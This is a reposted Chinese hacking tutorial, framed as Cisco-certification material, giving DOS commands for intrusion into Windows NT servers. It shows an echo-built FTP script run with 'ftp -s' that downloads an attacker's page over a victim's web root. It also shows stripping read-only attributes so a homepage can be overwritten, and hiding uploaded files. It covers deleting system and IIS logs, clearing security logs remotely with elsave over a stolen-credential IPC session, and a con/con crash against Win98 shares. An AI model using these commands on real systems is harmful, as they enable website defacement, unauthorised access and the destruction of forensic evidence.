思科认证:入侵命令详解5

本文介绍如何使用DOS命令实现文件下载、属性修改及日志清理等操作,包括具体步骤与注意事项。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

导读:
  这里说明一下, <和> 是重定向命令只是一个是输入重定向另一个是输出重定向,比如我们在命令提示符下就会显示c:/>这个意思就是把C盘的命令权重定向给我们,同样:也是定向的命令也叫作管道,它是用来连接两个命令的管道,先执行管道左边的命令,再执行管道右边的命令,不过我是没能耐把DOS命令说明白的,想研究就买本dos大全看吧,够看半年的了。
  -------------------------------------------------------
  大家可以本地试下。
  可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。
  1、首先,我们需要申请一个免费的主页空间。
  2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。)
  open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的)
  cnhack(你申请时的用户名)
  test(你申请时的密码)
  get index.htm c:/inetpub/wwwroot/index.htm(这里是把你空间上的index.htm下载到对方的c:/inetpub/wwwroot/index.htm)
  bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)
  ---------------------------------------------
  具体的做法:
  输入 echo open upload.chinaren.com> c:/cnhack.txt
  输入 echo cnhack >>c:/cnhack.txt
  输入 echo 39abs >>c:/cnhack.txt
  输入 echo get index.htm c:/inetpub/wwwroot/index.htm+>>+c:/cnhack.txt
  最后输入 ftp -s:c:/cnhack.txt (利用ftp的-s参数,执行文件里的内容。)
  等命令完成时,文件已经下载到你指定的文件里了。
  -----------------------
  注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。)
  记得要 del c:/cnhack.txt
  --------------------------------------------------------------------------------
  11:attrib
  这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。
  attrib -r index.htm
  这个命令是把index.htm的只读属性去掉。
  如果把“-”改为“+”则是把这个文件的属性设置为只读
  ----------------------
  attrib +r index.htm
  这个命令是把index.htm的属性设置为只读。
  ----------------------------------------
  attrib这个命令先要用来查属性,比如attrib 文件名,这样就显示出这个文件的属性了,它不止有R这个属性,其实一共有四种属性, a 档案属性 r 只读属性 h隐含属性 s系统属性,我们想用哪个就用哪个,我觉得把我们上传的文件加个隐含属性更有意思,,,,,继续挑那贴的错.
  ---------------------------------------------------------------------------------------------------------------------------
  12:del
  当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。
  NT的日志有这些
  del C:/winnt/system32/logfiles/*.*
  del C:/winnt/ssytem32/config/*.evt
  del C:/winnt/system32/dtclog/*.*
  del C:/winnt/system32/*.log
  del C:/winnt/system32/*.txt
  del C:/winnt/*.txt
  del C:/winnt/*.log
  只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改成其他盘。
  Internet信息服务FTP日志默认位置:%systemroot%/system32/logfiles/msftpsvc1/,默认每天一个日志
  Internet信息服务WWW日志默认位置:%systemroot%/system32/logfiles/w3svc1/,默认每天一个日志
  Scheduler服务日志默认位置:%systemroot%/schedlgu.txt
  以上日志在注册表里的键:
  应用程序日志,安全日志,系统日志,DNS服务器日志,它们这些LOG文件在注册表中的:
  HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Eventlog
  有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表,里面可查到以上日志的定位目录。
  Schedluler服务日志在注册表中
  HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/SchedulingAgent
  --------------------------------------------------------------------
  del确实是删除文件用的,log也确实是日志文件类型,不过按上面这种方法是不可能清理掉你自身的日志的,因为系统自动运行着日志记录,你在做这些时它一直都在记录着,并没有停止,大家也会常看到,有时删除某个文件时会提示系统正在占用拒绝删除的,呵呵,这就明白了,系统正在运行的东西已经驻留内存里,当然不能这样删除掉了,大家怕了吧,这样删等于帮别人清理了日志,没删自己那份啊,哈哈哈哈,要问我怎么清理,我只说大家还是用小榕的工具来清吧,那个又快又好,我们何必去用那些烦琐的命令行呢,尤其对生长在windows桌面操作下的人们那显然是太麻烦了,我推荐小榕的elsave工具,清理日志又快又干净,还省电呢,嘻嘻,我可不是做广告来的。
  -------------------------------------------------------------------------
  借助第三方工具:如小榕的elsave.exe远程清除system,applicaton,security的软件,
  使用方法很简单,首先利用获得的管理员账号与对方建立ipc会话,net use //ip pass /us
  er: user
  然后命令行下:elsave -s //ip -l application -C,这样就删除了安全日志。
  其实利用这个软件还可以进行备份日志,只要加一个参数 -f filename就可以了,在此不再详述。
  --------------------------------------------------------------------------------局域网要别人死机? 他C盘开了共享的话(win98,而且没有打补丁),你在DOS下输入
  //他的IP或机器名/c/con/con
  --------------------------------------------------------------------------------

本文转自
http://www.exam8.com/computer/Cisco/jiaocheng/200506/14523_5.html
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值